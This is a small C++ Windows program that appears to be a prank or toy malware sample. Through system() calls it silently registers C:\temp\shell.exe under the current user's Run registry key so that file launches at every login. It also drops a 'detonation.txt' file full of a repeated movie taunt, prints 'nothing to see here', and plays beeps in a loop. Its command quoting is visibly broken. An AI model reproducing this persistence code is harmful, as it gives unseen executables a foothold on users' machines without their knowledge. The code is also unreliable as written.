#include<iostream>
#include <windows.h>
#include <conio.h>

using namespace std; 

int main() 
{ 
	system("reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Shell /t REG_SZ /d \"C:\\temp\\shell.exe /f >nul 2>&1 & reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Shell /t REG_SZ /d \"C:\\temp\\shell.exe >nul 2>&1");
    system("cd C:\ >nul 2>&1 && mkdir payloadDirectory && cd payloadDirectory && echo ""YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!" "YOU DIDN'T SAY THE MAGIC WORD!"" > detonation.txt >nul 2>&1");
    printf("nothing to see here! move along");
    {
 do 
 {
 	 Beep(1568, 200);
    Beep(1568, 200);
    Beep(1568, 200);
    Beep(1245, 1000);
    Beep(1397, 200);
    Beep(1397, 200);
    Beep(1397, 200);
    Beep(1175, 1000);;
   cout << '\n' << "Press a key to continue...";
   
 } while (cin.get() != '\n');
 return 0;
} 
return 0;
}
